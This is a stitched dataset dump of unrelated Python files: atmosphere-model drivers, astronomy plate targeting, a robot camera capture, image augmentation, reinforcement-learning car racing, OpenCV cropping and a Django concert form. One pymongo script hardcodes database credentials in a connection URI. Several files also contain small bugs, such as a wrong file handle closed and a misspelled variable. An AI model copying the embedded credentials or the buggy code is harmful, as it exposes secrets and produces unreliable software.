See out.out file\")\r\n sys.exit()\r\n\r\ndef setPhotoCouple(val):\r\n \"\"\"\r\n Turn the photochemical model coupling on (if val==1) or off \r\n (if val==0)\r\n \"\"\"\r\n filename = \"new_file\"\r\n couple_str = \"ICOUPLE= %1d\\n\"%(val)\r\n input_file = open(PHOTO_GENERAL_INPUT)\r\n output_file = open(filename, \"wt\")\r\n for ind, line in enumerate(input_file):\r\n if ind==14:\r\n #this is the ICOUPLE line in input_photochem.dat\r\n line = couple_str\r\n output_file.write(line)\r\n planet_file.close()\r\n output_file.close()\r\n\r\n #UNIX complains that the operation isn't permitted if you try to copy here\r\n return filename\r\n\r\n################################Start the script################################\r\n\r\n#read the CH4 and CO2 from the command line\r\nif len(sys.argv) != 6:\r\n CH4 = float(input(\"Enter the CH4 mixing ratio as a fraction: \"))\r\n CO2 = float(input(\"Enter the CO2 mixing ratio as a fraction: \"))\r\n SOLCON = float(input(\"Enter the solar constant as a fraction of modern: \"))\r\n INPUT_TEMP_FILE = input(\"Enter the TempIn.dat file to use: \")\r\n CONTINUE_RUN = bool(int(input(\"Continue last run? [0=no, 1=yes]: \")))\r\nelse:\r\n CH4 = float(sys.argv[1])\r\n CO2 = float(sys.argv[2])\r\n SOLCON = float(sys.argv[3])\r\n INPUT_TEMP_FILE = sys.argv[4]\r\n CONTINUE_RUN = bool(int(sys.argv[5]))\r\n\r\n#configure the results directory\r\nRESULT_DIR += \"solcon_%0.2f/CO2_%2.1e_CH4_%2.1e/\"%(SOLCON, CO2, CH4)\r\nif not os.path.exists(RESULT_DIR):\r\n os.makedirs(RESULT_DIR)\r\n\r\n#set the log and result files\r\nLOG_FILE = RESULT_DIR + \"log.txt\"\r\nRESULT_FILE = RESULT_DIR + \"results.txt\"\r\n\r\n\r\n#format the CH4, CO2, and N2 amounts as strings\r\nCH4_AMT_STR = (\"%2.1e\"%(CH4)).upper()\r\nCO2_AMT_STR = (\"%2.1e\"%(CO2)).upper()\r\nN2 = 0.99 - CH4 - CO2\r\nN2_AMT_STR = (\"%2.1e\"%(N2)).upper()\r\n\r\n#set the TempIn file appropriately\r\nproc = subprocess.Popen([\"cp\", INPUT_TEMP_FILE, CLIMA_TEMP_IN])\r\nproc.wait()\r\n\r\n\r\n#1. set the input values for the solar constant in PLANET.dat \r\nplanet_file = open(PHOTO_PLANET_INPUT)\r\noutput_file = open(\"temp_out\", \"wt\")\r\nfor ind, line in enumerate(planet_file):\r\n if ind==1:\r\n #this is the solcon line in PLANET.dat\r\n new_solcon = \"%1.2f\"%(SOLCON)\r\n line = re.sub(r'^\\d\\.\\d\\d', new_solcon, line)\r\n output_file.write(line)\r\nplanet_file.close()\r\noutput_file.close()\r\nproc = subprocess.Popen([\"mv\", \"temp_out\", PHOTO_PLANET_INPUT])\r\nproc.wait()\r\n\r\n#turn off coupling, copy the modified file\r\nif not CONTINUE_RUN:\r\n name = setPhotoCouple(0)\r\n proc = subprocess.Popen([\"mv\", name, PHOTO_GENERAL_INPUT])\r\n proc.wait()\r\n\r\n#2. set CH4, CO2, and N2\r\nspecies_file = open(PHOTO_SPECIES_INPUT)\r\noutput_file = open(\"temp_out\", \"wt\")\r\nfor ind, line in enumerate(species_file):\r\n if ind==28:\r\n #this is the CH4 line in PLANET.dat\r\n line = \"CH4 LL 0 4 1 0 0 0 1 0. %s 0. 0. 0 0. 0. \\n\"%(CH4_AMT_STR)\r\n\r\n if ind==70:\r\n line = \"CO2 IN 2 0 1 0 0 0 %s \\n\"%(CO2_AMT_STR)\r\n\r\n if ind==71:\r\n line = \"N2 IN 0 0 0 0 2 0 %s \\n\"%(N2_AMT_STR)\r\n output_file.write(line)\r\nspecies_file.close()\r\noutput_file.close()\r\nproc = subprocess.Popen([\"mv\", \"temp_out\", PHOTO_SPECIES_INPUT])\r\nproc.wait()\r\n\r\n#3. run the Photo model uncoupled\r\nproc = subprocess.Popen([\"./Photo.run\"], cwd=ATMOS_DIR)\r\nproc.wait()\r\n\r\n#4. handle the PhotoChem output\r\nhandlePhotoOutput()\r\n \r\n#5. 
turn coupling back on for photochem\r\nname = setPhotoCouple(1)\r\nproc = subprocess.Popen([\"mv\", name, PHOTO_GENERAL_INPUT])\r\nproc.wait()\r\n\r\n#6. now loop over the climate model and photochem model until converged\r\nnum_runs = 5\r\nshould_cont = True\r\nlast_temp = 0\r\nwhile num_runs > 0 and should_cont:\r\n    num_runs -= 1\r\n\r\n    #run the climate model\r\n    proc = subprocess.Popen([\"./Clima.run\"], cwd=ATMOS_DIR)\r\n    proc.wait()\r\n\r\n    #handle the clima output\r\n    new_temp = handleClimaOutput()\r\n\r\n    #check if it's stopped changing\r\n    if abs(new_temp - last_temp) < 0.1:\r\n        #temp is barely changing, let's call it good?\r\n        should_cont = False\r\n    else:\r\n        #if this isn't the last time, run the photo again\r\n        if num_runs > 0:\r\n            #loop again! run the Photo model\r\n            proc = subprocess.Popen([\"./Photo.run\"], cwd=ATMOS_DIR)\r\n            proc.wait()\r\n\r\n            #handle the PhotoChem output\r\n            handlePhotoOutput()\r\n\r\n    last_temp = new_temp\r\n\r\nif should_cont:\r\n    #didn't converge in 5 loops\r\n    print(\"Did not converge in max number of loops. Inspect this output.\")\r\nelse:\r\n    print(\"Model appears to have converged!\")\r\n\r\n#save the final temp to the results file\r\nresults_file = open(RESULT_FILE, \"w+\")\r\nresults_file.write(\"Final temp was: %0.2f K for CO2=%2.3e, CH4=%2.3e, SOLCON=%0.2f\\n\"%(last_temp, CO2, CH4, SOLCON))\r\nresults_file.close()\r\n","sub_path":"atmos_data/run_atmos.py","file_name":"run_atmos.py","file_ext":"py","file_size_in_byte":7085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"310228068","text":"## It's a place to store your data - NoSQL --> mongodb\nfrom pymongo import MongoClient\n\nURI = \"mongodb://user01:linh99@ds229621.mlab.com:29621/c4e19-lab\"\n#1. Connect to the db\nclient = MongoClient(URI)\n#2. Get database\ndb = client.get_default_database()\n#3. Create collections\ngames = db[\"Games\"]\nentertainment_links = db[\"Entertaining links\"]\n# #4. Create Documents\n# new_game = {\n#     \"Name\":\"Cắt lông mũi\",\n#     \"Description\":\"Funny game\",\n#     \"Type\":\"Nhảm nhí\",\n# }\n# links = {\n#     \"1\":\"Google.com\",\n#     \"2\":\"tumblr.com\",\n#     \"3\":\"Instagram.com\"\n# }\n# #5. Insert Doc into collection\n# games.insert_one(new_game)\n# entertainment_links.insert_one(links)\nall_games = games.find()\nprint(all_games[2][\"Name\"])\n","sub_path":"Labs/session6/Database_intro.py","file_name":"Database_intro.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"383170534","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nStandardPlateTargets.py\n\nCreated by José Sánchez-Gallego on 22 Oct 2015.\nLicensed under a 3-clause BSD license.\n\nRevision history:\n    22 Oct 2015 J. Sánchez-Gallego\n      Initial version\n\n\"\"\"\n\nfrom __future__ import division, print_function\n\nimport os\n\nimport numpy as np\nfrom astropy import table\n\nfrom Gohan import log, readPath\nfrom Gohan.exceptions import GohanPlateTargetsError, GohanPlateTargetsWarning\nfrom Gohan.PlateTargets import PlateTargets, _toLowerCase\nfrom Gohan.utils import utils, yanny\n\n\nclass StandardPlateTargets(PlateTargets):\n\n    def __init__(self, arg=None, **kwargs):\n        \"\"\"A class to handle standard plateTargets files.\n\n        Parameters\n        ----------\n        arg : string or None.\n            The path to the plateTargets file to use. 
If None, the template\n will be used.\n\n \"\"\"\n\n self.template = False\n self._nAppended = 0\n self.catalogid = 'standard'\n\n if arg is not None:\n self.path = arg\n if not os.path.exists(self.path):\n raise GohanPlateTargetsError('path {0} cannot be found'\n .format(self.path))\n\n else:\n starPlateTargetsPath = os.path.join(\n os.path.dirname(utils.getPlateTargetsPath(1)),\n 'standardPlateTargets.par')\n\n if os.path.exists(starPlateTargetsPath):\n self.path = starPlateTargetsPath\n else:\n self.path = readPath(\n '+templates/standardPlateTargets.template')\n if self.path is None:\n raise GohanPlateTargetsError(\n 'neither the plateTargets nor the template '\n 'for catalogid={0} can be found'\n .format(self.catalogid))\n log.warning('using template for standardPlateTargets', GohanPlateTargetsWarning)\n self.template = True\n\n data = yanny.yanny(self.path, np=True)\n\n self.comments = self._getComments(data)\n self.structure = table.Table(data['PLTTRGT'])\n\n if self.template:\n self.structure.remove_row(0)\n\n def write(self):\n \"\"\"Writes the current instance to a Yanny file.\"\"\"\n\n path = os.path.join(os.path.dirname(utils.getPlateTargetsPath(1)),\n 'standardPlateTargets.par')\n\n path, nAppended = super(StandardPlateTargets, self).write(\n path=path, useCatID=False)\n\n log.debug('standardPlateTargets saved to {0}'.format(path))\n log.debug('{0} targets appended to standardPlateTargets'\n .format(nAppended))\n\n return path, nAppended\n\n def addTargets(self, plateid, mangaids=None, **kwargs):\n \"\"\"Adds targets to the standard plate targets.\"\"\"\n\n mangaStandardPath = utils.getPlateInputPath(plateid, mode='standard',\n format='plateid')\n\n if mangaids is None:\n mangaStandard = table.Table(yanny.yanny(mangaStandardPath, np=True)['MANGAINPUT'])\n mangaids = list(map(lambda xx: xx.strip(), mangaStandard['mangaid']))\n\n addedIndices = []\n\n overwrite = kwargs.get('overwrite', False)\n\n commonData, mangaids, plateid = super(\n StandardPlateTargets, self).addTargets(\n mangaids=mangaids, plateid=plateid,\n mangaScience=mangaStandardPath)\n\n specificData = self.getSpecificData(mangaids, plateid)\n\n # Finally we add the data target by target.\n for mangaid in mangaids:\n\n # We combine both dictionaries\n targetData = commonData[mangaid]\n\n # Removes columns that are not in the template\n remove_keys = []\n for key in targetData:\n if key not in self.structure.colnames:\n remove_keys.append(key)\n\n for key in remove_keys:\n targetData.pop(key)\n\n if mangaid in specificData:\n targetData.update(specificData[mangaid])\n\n # Checks if the targets already exists in plateTargets.\n existing = False\n\n if plateid is not None:\n\n # Checks if the tuple (mangaid, plateid) already exists in\n # plateTargets.\n plateTargetRow = self.structure[\n (self.structure['mangaid'] == mangaid) &\n (self.structure['plateid'] == plateid)]\n\n if len(plateTargetRow) > 0:\n # If it exists, checks if overwrite is True\n if overwrite:\n existing = True\n log.warning('replacing target mangaid={0} in plateid={1}'\n .format(mangaid, plateid), GohanPlateTargetsWarning)\n else:\n # If overwrite is False, skips this target.\n log.debug('skipping mangaid={0} because it is already '\n 'in plateTargets.'.format(mangaid))\n continue\n\n # Cleans up values\n targetData = self._cleanupTargetData(targetData)\n\n # Applies target fixes\n targetData = self._applyTargetFix(targetData)\n\n if targetData['iauname'] == -999.:\n targetData['iauname'] = '-999'\n\n # Adds the new targets\n if not existing:\n 
self.structure.add_row(targetData)\n addedIndices.append(len(self.structure) - 1)\n else:\n # If the target already exists, replaces it values\n idx = np.where((self.structure['mangaid'] == mangaid) &\n (self.structure['plateid'] == plateid))\n\n for field in targetData:\n self.structure[field][idx] = targetData[field]\n addedIndices.append(idx[0][0])\n\n self._nAppended += 1\n\n log.debug('mangaid={0} added to standardPlateTargets'\n .format(mangaid))\n\n return self.structure[addedIndices]\n\n def getSpecificData(self, mangaids, plateid):\n \"\"\"Gathers star parameters from mangaStandard.\"\"\"\n\n if plateid is None:\n raise GohanPlateTargetsError('plateid required to retrieve '\n 'specific data')\n\n requiredFields = utils.getRequiredPlateTargetsColumns()\n specificFields = [field for field in self.structure.colnames\n if field not in requiredFields]\n\n mangaStandardPath = utils.getPlateInputPath(\n plateid, mode='standard', format='plateid')\n mangaStandard = table.Table(\n yanny.yanny(mangaStandardPath, np=True)['MANGAINPUT'])\n mangaStandard = _toLowerCase(mangaStandard)\n mangaStandard['mangaid'] = list(map(lambda xx: xx.strip(), mangaStandard['mangaid']))\n\n specificData = {}\n for mangaid in mangaids:\n\n specificData[mangaid] = {}\n\n row = mangaStandard[mangaStandard['mangaid'] == mangaid.strip()][0]\n\n for field in specificFields:\n if field in mangaStandard.colnames:\n if field == 'extinction':\n if len(row[field]) == 7:\n specificData[mangaid][field] = row[field][2:]\n continue\n specificData[mangaid][field] = row[field]\n else:\n if field in ['extinction', 'pmra', 'pmdec']:\n specificData[mangaid][field] = 0.\n elif field == 'epoch_imaging':\n if 'epoch' in mangaStandard.colnames:\n specificData[mangaid][field] = row['epoch']\n else:\n specificData[mangaid][field] = -999.\n else:\n specificData[mangaid][field] = -999.\n\n return specificData\n","sub_path":"python/Gohan/StandardPlateTargets.py","file_name":"StandardPlateTargets.py","file_ext":"py","file_size_in_byte":8117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"195451812","text":"import sys\nsys.path.insert(0,'/home/pi/zumi/lib')\nfrom TawnCam import PiCamera\nimport time\nimport cv2\nfrom IPython import display\nimport PIL.Image\n\n\ndef clean_up():\n camera.shutdown() \n exit()\n\ncamera = PiCamera(image_w=64, image_h=64, image_d=3, framerate=10)\n\ncommand = 'start'\nSTATE = ''\ncnt = 0\nend_cnt = 100\ntry:\n while True: \n if end_cnt == cnt :\n cmmand = 'start'\n image = camera.run()\n image = cv2.flip(image, -1)\n \n if command == 'start':\n command = input(\"start:\") \n end_cnt = input(\"how much:\")\n cnt = 0\n if command == 'a':\n STATE = 'ar_left' \n elif command == 's':\n STATE = 'ar_stop'\n elif command == 'd':\n STATE = 'ar_right' \n command = \"\" \n cnt += 1\n print(STATE + \"!\" + cnt)\n \n \n #if command !=\"\":\n # print (\"restart\")\n # STATE = \"re_start\"\n if command == \"\" and STATE in ['ar_stop', 'ar_left', 'ar_right']:\n file_name = \"/home/pi/zumi/sample/deep-learning-demos/arrow/images/\" + str(time.time()) + \".\" + command + \".jpg\"\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n cv2.imwrite(file_name, image)\n else:\n print(\"# bad command: \" + command)\n command = 'start'\n time.sleep(1)\nfinally:\n 
clean_up()\n","sub_path":"sample/deep-learning-demos/arrow/take_picture.py","file_name":"take_picture.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"583159729","text":"# coding = utf-8\nimport numpy as np\nimport cv2\ndef add_gasuss_noise(image, mean=0, var=0.001):\n    '''\n    Add Gaussian noise\n    mean : mean of the noise\n    var : variance of the noise\n    '''\n    image = np.array(image/255, dtype=float)\n    noise = np.random.normal(mean, var ** 0.5, image.shape)\n    out = image + noise\n    if out.min() < 0:\n        low_clip = -1.\n    else:\n        low_clip = 0.\n    out = np.clip(out, low_clip, 1.0)\n    out = np.uint8(out*255)\n    return out\ndef add_haze(image, t=0.6, A=1):\n    '''\n    Add haze\n    t : transmission rate, 0~1\n    A : atmospheric light\n    '''\n    out = image*t + A*255*(1-t)\n    return out\ndef ajust_image(image, cont=1, bright=0):\n    '''\n    Adjust contrast and brightness\n    cont : contrast; contrast should be adjusted together with brightness\n    bright : brightness\n    '''\n    out = np.uint8(np.clip((cont * image + bright), 0, 255))\n    # tmp = np.hstack((img, res)) # stack the two images horizontally (for side-by-side comparison)\n    return out\ndef ajust_image_hsv(image, h=1, s=1, v=0.8):\n    '''\n    Adjust the HSV channels; scale the V channel to change brightness\n    h, s, v : per-channel coefficients\n    '''\n    HSV = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n    H, S, V = cv2.split(HSV)\n    H2 = np.uint8(H * h)\n    S2 = np.uint8(S * s)\n    V2 = np.uint8(V * v)\n    hsv_image = cv2.merge([H2, S2, V2])\n    out = cv2.cvtColor(hsv_image, cv2.COLOR_HSV2BGR)\n    return out\ndef ajust_jpg_quality(image, q=100, save_path=None):\n    '''\n    Adjust the JPEG compression distortion of the image\n    q : compression quality, 0~100\n    '''\n    if save_path is None:\n        cv2.imwrite(\"jpg_tmp.jpg\", image, [int(cv2.IMWRITE_JPEG_QUALITY), q])\n        out = cv2.imread('jpg_tmp.jpg')\n        return out\n    else:\n        cv2.imwrite(save_path, image, [int(cv2.IMWRITE_JPEG_QUALITY), q])\ndef add_gasuss_blur(image, kernel_size=(3, 3), sigma=0.1):\n    '''\n    Add Gaussian blur\n    kernel_size : blur kernel size\n    sigma : standard deviation\n    '''\n    out = cv2.GaussianBlur(image, kernel_size, sigma)\n    return out\ndef test_methods():\n    img = cv2.imread('test.jpg')\n    out = add_haze(img)\n    cv2.imwrite(\"add_haze.jpg\", out)\n    out = add_gasuss_noise(img)\n    cv2.imwrite(\"add_gasuss_noise.jpg\", out)\n    out = add_gasuss_blur(img)\n    cv2.imwrite(\"add_gasuss_blur.jpg\", out)\n    out = ajust_image(img)\n    cv2.imwrite(\"ajust_image.jpg\", out)\n    out = ajust_image_hsv(img)\n    cv2.imwrite(\"ajust_image_hsv.jpg\", out)\n    ajust_jpg_quality(img, save_path='ajust_jpg_quality.jpg')\n\ntest_methods()","sub_path":"addnoise.py","file_name":"addnoise.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"358367494","text":"import torch\nimport gym\nimport numpy as np\nfrom TD3 import TD3\nfrom DDPG import DDPG\nfrom utils import NaivePrioritizedBuffer\nimport os\nimport roboschool, gym\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport torch.optim as optim\nimport Box2D\nimport pdb\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nfrom utils import DrawLine\nimport math\nimport argparse\n\nfrom torch.distributions import Beta\nfrom torch.utils.data.sampler import BatchSampler, SubsetRandomSampler\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nparser = argparse.ArgumentParser(description='Train a TD3 agent for the CarRacing-v0')\nparser.add_argument('policy', help='Choose policy')\nargs = parser.parse_args()\n\n\nclass Env():\n    \"\"\"\n    Environment wrapper for CarRacing\n    \"\"\"\n\n    def __init__(self, env_name, random_seed, img_stack, action_repeat):\n        self.env = gym.make(env_name)\n        
self.env.seed(random_seed)\n self.action_space = self.env.action_space\n self.reward_threshold = self.env.spec.reward_threshold\n self.img_stack = img_stack\n self.action_repeat = action_repeat\n\n def reset(self):\n self.counter = 0\n self.av_r = self.reward_memory()\n\n self.die = False\n img_rgb = self.env.reset()\n # print(img_rgb)\n img_gray = self.rgb2gray(img_rgb)\n self.stack = [np.expand_dims(img_gray, axis=0)] * self.img_stack # four frames for decision\n return torch.FloatTensor(self.stack).permute(1, 0, 2, 3)\n\n def step(self, action):\n total_reward = 0\n for i in range(self.action_repeat):\n img_rgb, reward, die, _ = self.env.step(action)\n # don't penalize \"die state\"\n if die:\n reward += 100\n # green penalty\n if np.mean(img_rgb[:, :, 1]) > 185.0:\n reward -= 0.05\n total_reward += reward\n # if no reward recently, end the episode\n done = True if self.av_r(reward) <= -0.1 else False\n if done or die:\n break\n img_gray = self.rgb2gray(img_rgb)\n self.stack.pop(0)\n self.stack.append(np.expand_dims(img_gray, axis=0))\n assert len(self.stack) == self.img_stack\n return torch.FloatTensor(self.stack).permute(1, 0, 2, 3), total_reward, done, die\n\n def render(self, *arg):\n self.env.render(*arg)\n\n @staticmethod\n def rgb2gray(rgb, norm=True):\n # rgb image -> gray [0, 1]\n gray = np.dot(rgb[..., :], [0.299, 0.587, 0.114])\n if norm:\n # normalize\n gray = gray / 128. - 1.\n return gray\n\n @staticmethod\n def reward_memory():\n # record reward for last 100 steps\n count = 0\n length = 100\n history = np.zeros(length)\n\n def memory(reward):\n nonlocal count\n history[count] = reward\n count = (count + 1) % length\n return np.mean(history)\n\n return memory\n\n\ndef train(env):\n ######### Hyperparameters #########\n env_name = env\n log_interval = 10 # print avg reward after interval\n random_seed = 0\n gamma = 0.99 # discount for future rewards\n batch_size = 100 # num of transitions sampled from replay buffer\n lr = 0.001\n exploration_noise = 0.5\n polyak = 0.995 # target policy update parameter (1-tau)\n policy_noise = 0.2 # target policy smoothing noise\n noise_clip = 0.5\n policy_delay = 2 # delayed policy updates parameter\n max_episodes = int(1e8) # max num of episodes\n max_timesteps = 500 # max timesteps in one episode\n save_every = 100 # model saving interal\n img_stack = 4 # number of image stacks together\n action_repeat = 8 # repeat action in N frames\n max_size = 1e6\n vis = True\n\n \"\"\" parameters for epsilon declay \"\"\"\n epsilon_start = 1\n epsilon_final = 0.01\n decay_rate = max_episodes / 50\n\n \"\"\" beta Prioritized Experience Replay\"\"\"\n beta_start = 0.4\n beta_frames = 25000\n\n # if not os.path.exists('./TD3tested'):\n # os.mkdir('./TD3tested')\n directory = \"./{}\".format(env_name) # save trained models\n filename = \"TD3_{}_{}\".format(env_name, random_seed)\n\n ###################################\n\n env = Env(env_name, random_seed, img_stack, action_repeat)\n # print(\"env\")\n action_dim = env.action_space.shape[0]\n # if vis:\n # draw_reward = DrawLine(env=\"car\", title=\"PPO\", xlabel=\"Episode\", ylabel=\"Moving averaged episode reward\")\n if args.policy == 'TD3':\n policy = TD3(action_dim, img_stack)\n if args.policy == 'DDPG':\n policy = DDPG(action_dim, img_stack)\n replay_buffer = NaivePrioritizedBuffer(int(max_size))\n\n if random_seed:\n print(\"Random Seed: {}\".format(random_seed))\n torch.manual_seed(random_seed)\n\n # logging variables:\n\n log_f = open(\"log.txt\", \"w+\")\n ## for plot\n Reward = []\n 
total_timesteps = 0\n episode_timesteps = 0\n running_score = 0\n\n # training procedure:\n for episode in range(1, max_episodes + 1):\n state = env.reset()\n # print(\"here\")\n episode_timesteps = 0\n score = 0\n\n for t in range(max_timesteps):\n # select action and add exploration noise:\n # print(\"state: \" + str(state))\n action = policy.select_action(state)\n # print(\"action: \" + str(action))\n exploration_noise = (epsilon_start - epsilon_final) * math.exp(-1. * total_timesteps / decay_rate)\n action = action + np.random.normal(0, exploration_noise, size=action_dim)\n action = action.clip(env.action_space.low, env.action_space.high)\n # print(\"action clipped: \" + str(action))\n\n # take action in env:\n next_state, reward, done, die = env.step( action * np.array([2., 1., 1.]) + np.array([-1., 0., 0.]) )\n # print(\"state: \" +str(next_state))\n env.render()\n replay_buffer.add(state, next_state, action, reward, float(done))\n state = next_state\n\n score += reward\n total_timesteps += 1\n episode_timesteps += 1\n\n # if episode is done then update policy:\n if done or t == (max_timesteps - 1):\n beta = min(1.0, beta_start + total_timesteps * (1.0 - beta_start) / beta_frames)\n policy.train(replay_buffer, episode_timesteps, beta)\n break\n\n running_score = running_score * 0.99 + score * 0.01\n\n\n\n if episode % log_interval == 0:\n # if vis:\n # draw_reward(xdata = episode, ydata = running_score)\n log_f.write('Ep {}\\tLast score: {:.2f}\\tMoving average score: {:.2f}\\n'.format(episode, score, running_score))\n log_f.flush()\n print('Ep {}\\tLast score: {:.2f}\\tMoving average score: {:.2f}'.format(episode, score, running_score))\n\n\n # if avg reward > 300 then save and stop traning:\n if running_score >= 900:\n # if episode % save_every == 0:\n print(\"########## Model received ###########\")\n name = filename\n policy.save(directory, name)\n log_f.close()\n break\n\n if episode % 100 == 0:\n if not os.path.exists(directory):\n os.mkdir(directory)\n policy.save(directory, filename)\n\n\nif __name__ == \"__main__\":\n train('CarRacing-v0')","sub_path":"car_racing.py","file_name":"car_racing.py","file_ext":"py","file_size_in_byte":7529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"190129197","text":"2\n3\n4\n5\n6\n7\n8\n9\n10\n11\n12\n13\n14\n15\n16\n17\n# import the necessary packages\nimport cv2\n\n# load the image and show it\nimage = cv2.imread(\"./images/florida_trip.png\")\ncv2.imshow(\"Original\", image)\n\n# cropping an image is accomplished using simple NumPy array slices --\n# let's crop the face from the image\nface = image[85:250, 85:220]\ncv2.imshow(\"Face\", face)\ncv2.waitKey()\n\n# ...and now let's crop the entire body\nbody = image[90:450, 0:290]\ncv2.imshow(\"Body\", body)\ncv2.waitKey()\nred = (0, 0, 255)\n\n# cv2.line(image, (85, 85), (220, 220), red, 5)\n\ncv2.imshow(\"Canvas\", image)\ncv2.waitKey()\n\n\ntry1 = image[173:235, 13:81]\ncv2.imshow(\"try1\", try1)\ncv2.waitKey()\n\n\ntry2 = image[124:212, 225:380]\ncv2.imshow(\"try2\", try2)\ncv2.waitKey()\n\ntry3 = image[90:450, 0:290]\ncv2.imshow(\"try3\", try3)\ncv2.waitKey()\n\n\ntry4 = image[85:250, 85:220]\ncv2.imshow(\"try4\", try4)\ncv2.waitKey()\n\n\n\ncv2.destroyAllWindows()","sub_path":"module1/cropping-1.4.5.py","file_name":"cropping-1.4.5.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"597788071","text":"# Code your solution 
here\nfigure_list = {\n \"3\":\"Triangle\",\n \"4\":\"Quadrilateral\",\n \"5\":\"Pentagon\",\n \"6\":\"Hexagon\",\n \"7\":\"Heptagon\",\n \"8\":\"Octagon\", \n \"9\":\"Nonagon\"\n}\ndata = []\n# figure = input(\"figure: \")\nfigure = \"5\"\nif figure in figure_list:\n data.append(figure_list[figure])\n print (figure_list[figure])\n \nelse: \n print(figure) \n","sub_path":"introduction_and_environment/data_types_and_control_flow/3_shape_check/Solution/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"425926791","text":"# https://stackoverflow.com/questions/50380769/how-to-create-a-autocomplete-input-field-in-a-form-using-django\n\nfrom django import forms\nfrom django.forms import ModelForm\nfrom django.forms.widgets import NumberInput\nfrom django.forms.models import inlineformset_factory\n\nimport datetime\n\nfrom .models import Concert, Genre, Artist, Organisation, Location, GigFinderUrl\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Row, Column, Div, ButtonHolder, Submit, HTML, Button\n\nfrom dal import autocomplete\n\nclass ConcertForm(forms.ModelForm):\n location = forms.ModelChoiceField(\n queryset=Location.objects.all(),\n widget=autocomplete.ModelSelect2(url='location_autocomplete_select', attrs={\n # Set some placeholder\n 'data-placeholder': 'Autocomplete ...',\n # Only trigger autocompletion after 3 characters have been typed\n 'data-minimum-input-length': 3,\n },),\n required=False,\n )\n\n class Meta:\n model = Concert\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(ConcertForm, self).__init__(*args, **kwargs)\n self.fields['artist'] = forms.ModelMultipleChoiceField(\n queryset=Artist.objects.all(),\n widget=autocomplete.ModelSelect2Multiple(url='artist_autocomplete_select')\n )\n self.fields['organisation']=forms.ModelMultipleChoiceField(\n queryset=Organisation.objects.all(),\n widget=autocomplete.ModelSelect2Multiple(url='organisation_autocomplete_select',\n forward=['location'])\n )\n self.fields['date']=forms.DateField(help_text=datetime.date.today)\n self.fields['cancelled']=forms.BooleanField(\n widget=forms.CheckboxInput(),\n required=False)\n self.fields['verified']=forms.BooleanField(\n widget=forms.CheckboxInput(),\n required=False)\n self.fields['manual']=forms.BooleanField(widget=forms.CheckboxInput(), required=False)\n self.fields['ignore']=forms.BooleanField(widget=forms.CheckboxInput(), required=False)\n self.fields['genre']=forms.ModelMultipleChoiceField(\n queryset=Genre.objects.all(),\n widget=forms.CheckboxSelectMultiple,\n required=False)\n\n self.fields['description']=forms.CharField(widget=forms.Textarea(attrs={'rows': 1 }), required=False)\n self.fields['annotation']=forms.CharField(widget=forms.Textarea(attrs={'rows': 1}), required=False)\n self.fields['program']=forms.CharField(widget=forms.Textarea(attrs={'rows': 1}), required=False)\n self.fields['evidence']=forms.CharField(widget=forms.Textarea(attrs={'rows': 1}), required=False)\n\n\n self.fields['organisation'].widget.attrs.update({'class' : 'autocomplete-list'})\n self.fields['artist'].widget.attrs.update({'class' : 'autocomplete-list'})\n self.fields['location'].widget.attrs.update({'class' : 'autocomplete-list'})\n self.fields['until_date']=forms.DateField(help_text=datetime.date.today, required=False)\n self.fields['time']=forms.TimeField(help_text=str(datetime.time(11,30))[0:5], required=False)\n\n 
self.helper=FormHelper()\n\n self.helper.layout=Layout(\n HTML(\"\"\"\n

Create/update a concert

\n \"\"\"),\n Row(\n Column('title', css_class='form-group col-md-12 mb-0'),\n css_class='form-row'\n ),\n Row(\n Column('artist', css_class='form-group col-md-12 mb-0'),\n css_class='form-row'\n ),\n Row(\n Column('date', css_class='form-group col-md-12 mb-0'),\n css_class='form-row'\n ),\n Row(\n Column('organisation', css_class='form-group col-md-6 mb-0'), \n Column('location', css_class='form-group col-md-6 mb-0'),\n css_class='form-row'\n ),\n Row(\n Column('description', css_class='form-group col-md-12 mb-0'),\n css_class='form-row'\n ),\n\n Div( \n Row(\n Column('evidence', css_class='form-group col-md-12 mb-0'),\n css_class='form-row'\n ),\n Row(\n Column('annotation', css_class='form-group col-md-12 mb-0')\n ),\n Row(\n Column('program', css_class='form-group col-md-12 mb-0')\n ),\n Row(\n Column('cancelled', css_class='form-group col-md-3 mb-0'),\n Column('verified', css_class='form-group col-md-3 mb-0'),\n Column('manual', css_class='form-group col-md-3 mb-0'),\n Column('ignore', css_class='form-group col-md-3 mb-0'),\n css_class='form-row'\n ),\n Row(\n Column('until_date', css_class='form-group col-md-4 mb-0'),\n Column('time', css_class='form-group col-md-4 mb-0'),\n css_class='form-row'\n ),\n Row(\n Column('genre', css_class='form-group col-md-12 mb-0'),\n css_class='form-row'\n ),\n Row(\n Column('latitude', css_class='form-group col-md-6 mb-0'),\n Column('longitude', css_class='form-group col-md-6 mb-0'),\n css_class='form-row'\n ),\n css_id='extra-fields'\n ),\n Row(\n Button('show-details', 'Toggle-details', onclick=\"toggleDetails()\", css_class=\"btn-toggle\")),\n )\n\n self.helper.add_input(Submit('submit', 'Submit', css_class='btn btn-outline-primary btn-custom form-left-button'))\n self.helper.form_method = 